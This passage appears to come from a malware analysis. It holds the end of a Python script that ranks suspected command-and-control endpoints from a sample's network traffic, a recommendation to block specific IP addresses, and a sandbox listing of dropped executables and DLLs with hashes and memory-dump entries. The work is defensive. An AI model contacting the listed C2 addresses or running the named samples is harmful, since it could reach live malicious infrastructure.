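    hits = Counter(f"{c.ip}:{c.port}" for c in conns if classify(c) == "c2_candidate")
    return sorted(((ep, n) for ep, n in hits.items() if n >= min_hits),
                  key=lambda t: (-t[1], t[0]))


def indicators(conns: list[Conn]) -> list[str]:
    """Names and addresses the sample reached, minus the resolver, loopback and background."""
    out: set[str] = set()
    for c in conns:
        kind = classify(c)
        if kind in ("loopback", "background"):
            continue
        if kind == "dns":
            if c.domain and c.domain not in BACKGROUND:
                out.add(c.domain)   # the queried name is the indicator, not 8.8.8.8
            continue
        out.add(c.domain or c.ip)
    return sorted(out)


if __name__ == "__main__":
    conns = parse_rows(SAMPLE_TABLE)
    print(category_counts(conns))
    print("C2 candidates:", c2_candidates(conns))
    print("indicators   :", indicators(conns))
```

On the full table the same ranking puts 194.104.136.5:46013 and 135.181.129.119:4805 far ahead of everything else, with 91.121.67.60:2151 and the unnamed port-80 hosts (45.9.20.13, 45.133.1.107, 51.178.186.149) next; those raw addresses are the ones to block first, since there is no domain to sinkhole.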
Files
\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
| MD5 | 9b2134ee1ae45204587c324a88830c08 |
| SHA1 | 4829c7a3ce45a7021d57c2da712949d7ea0f2bc6 |
| SHA256 | 3e0591618a8247d00aab0e95297f4250d140a312c52951d4163f5bc34d73af37 |
| SHA512 | 4055e2d5b5134079734b6c273292835ee557df6e4e1f26797084c7b737d99d7b6900b2f4e2563c5af8b051afffac9f2e18a60d57f11885444bf17f222170588d |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2136-56-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2136-60-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2136-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-69-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2136-68-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2136-70-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2136-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2136-78-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2136-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
| MD5 | 455c155c134be5785122eb4dd9966b57 |
| SHA1 | 2e9685a7511f53f236869378055d321896827b49 |
| SHA256 | 314846b9ef02e6cfd78a230e3966cee0f6b746a54f05a845e5af2817396ff2f1 |
| SHA512 | 6a0620b30f6fa46ab26eaf06cee1a019d7bca836bc99f090de0c5df45ea6e84aa83070bc8f1f497ed074417702419c5aee00f6e0b40f777d6f6f8be3a69ce793 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe
| MD5 | 619aa73b97d9d55df2ab142b8a7d9ae4 |
| SHA1 | 8e6aee5e473f278855887aeae38323e2bbb23b21 |
| SHA256 | 8164fcc1805d268c83bb84cfd42a21e9f85752c13c4d2033f191ed50fc8c47ed |
| SHA512 | ef488b50dc46e8f97701ae3530f0b8ba8dce60274b073b394e4c9344a63bfc852b2628b75b9267f747427ae3f8e52f1e38c00abe0b6bd700fd67eb8524cbaf58 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
| MD5 | d75800977e3ec3199509eb2e0a6a28f5 |
| SHA1 | 3edc49c3a466f3bbc977c42406fbd5c90d49e462 |
| SHA256 | 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b |
| SHA512 | 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe
| MD5 | 385ec35e040120516d0d8209c3058e6b |
| SHA1 | 15e04bcae85950c29ba2ae0311a3a444fa3954f5 |
| SHA256 | 4cda6584d780908c63ecd073f88160b7aa03cfbe240345e1e3d60b87bae21e36 |
| SHA512 | 211f04a84b08d1a696498a042fe1c61ccc212bfc4e88595a022145cfe8f228ed08d5d172b210854292dfec3cefb8efc6fcae62e4626a604209f0ea246cb28c7f |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe
| MD5 | 9074b165bc9d453e37516a2558af6c9b |
| SHA1 | 11db0a256a502aa87d5491438775922a34fb9aa8 |
| SHA256 | 3ffdaa1515622897c84111ab4180de09aadd03674935555270a2789625f7e513 |
| SHA512 | ee0b950587c5a16a3c255f4c6b333e65cc2ada8429efc27e02165f4b3402fbd257a67f5adb8a3ffc1c4a4c95ecf2582da5ffbcb64322107e0e664ac7c388b62b |
\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe
| MD5 | cd8b326d99a29d3c3586be7e51a33de9 |
| SHA1 | 5a50f0e17a398c6dc7c9c995826e7fe417762d07 |
| SHA256 | 0cd5a6958f291db7c078d25106a3265cce9aa53291c327ae1852a00b0d315049 |
| SHA512 | f5b75115291cf4fa15cb0a7a13a994bc18bd0195a2c088907fda270d6006f5e3bdf23aa482f0605cac381ceb15faab920daa0a143b5d448988b5055873d73c24 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe
| MD5 | 929f431a5093b6ba736d6d17216f237a |
| SHA1 | 19cd747e4aa9f185eca3656a4d3ef7d28a9a279f |
| SHA256 | 5650aab287506d1139b3a5511f012cc4fa2b152f49cb17fe653ddbc821fee8bc |
| SHA512 | 9c0ffde8b9cfe579584e03d21c11a6d60d03a18da75315c40a4370d05cefa9e728c84a0668b8d03e7fe7afb0020adcb84803f63b508a72df868605d89fc7e4e8 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe
| MD5 | c1071152823c75363b1fc55759ef2b8a |
| SHA1 | 463ab5487ef7e9e170491dd79e8ab75b2f782ad6 |
| SHA256 | c9ce0e9a228fc8069fc40c7a1cbcf764a1755ac3c26e1ab50b623c55035287fd |
| SHA512 | f4e52c4191128a32ff7ea3b3c06df0d8b648c7ef7e1167ede966a0399401693d7b25ab57393e915b66ff16e5b9ce62e100045e66e0f364673e2a16025de15994 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
| MD5 | a620135b51dda235d8cf29a7a0f24ef4 |
| SHA1 | 58eba3666c536215e3fc3660629dc63a999fe9e3 |
| SHA256 | 056091d19c1724c295197ccf6967d5b0cd98e87fa43dbbfd53de049526588b8d |
| SHA512 | fc6eac7f772dc14e96e421a16ab48092032baef5bd734e3ba58923a3b124ddcd7d39c5f3c0fd7056f4ef03b4f087244fce3e63788d3ddbfd7f166b2348fff0aa |
memory/2832-126-0x0000000000400000-0x0000000000414000-memory.dmp
memory/992-129-0x0000000000240000-0x000000000025C000-memory.dmp
memory/3060-131-0x0000000001250000-0x00000000012B6000-memory.dmp
memory/2988-130-0x0000000000390000-0x00000000003FA000-memory.dmp
memory/988-134-0x0000000000FF0000-0x0000000001060000-memory.dmp
memory/992-140-0x00000000008C0000-0x00000000008C6000-memory.dmp
memory/460-141-0x0000000000C20000-0x0000000000C28000-memory.dmp
memory/2136-142-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1664-139-0x0000000000400000-0x0000000002F01000-memory.dmp
memory/2832-150-0x0000000000400000-0x0000000000414000-memory.dmp
memory/876-149-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1692-153-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KVI8WOM8Z2NW81M0H5E0.temp
| MD5 | 56b2ae330cf3159e33f26ed9bfb26f5e |
| SHA1 | fe0bcf8e8afd1596c7a0881e97e5521615a3a679 |
| SHA256 | 1a4b7cc98b75ec3a757fd51e019319523961674f4bd4ff079c02181c070a26bd |
| SHA512 | 9ce981037211b7b4fed192dad9ffa7453d5501d12f124f4785a58febebfbbf54e6bad90a1865d44dc0f37fc31b8618677511f73cfe94dae0e68d221ade72d1e0 |
C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2136-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-177-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2136-176-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-175-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2136-173-0x0000000000400000-0x000000000051C000-memory.dmp
memory/372-204-0x00000000022B0000-0x0000000002445000-memory.dmp
memory/372-205-0x00000000027D0000-0x0000000002875000-memory.dmp
memory/372-209-0x0000000002880000-0x0000000002912000-memory.dmp
memory/372-206-0x0000000002880000-0x0000000002912000-memory.dmp
memory/1288-223-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-221-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2920-248-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-246-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-245-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2920-242-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-240-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-238-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-235-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-234-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-233-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-232-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2980-230-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-228-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-226-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-224-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1288-220-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-219-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1288-217-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-215-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-213-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2136-263-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2136-262-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-261-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-260-0x000000006B280000-0x000000006B2A6000-memory.dmp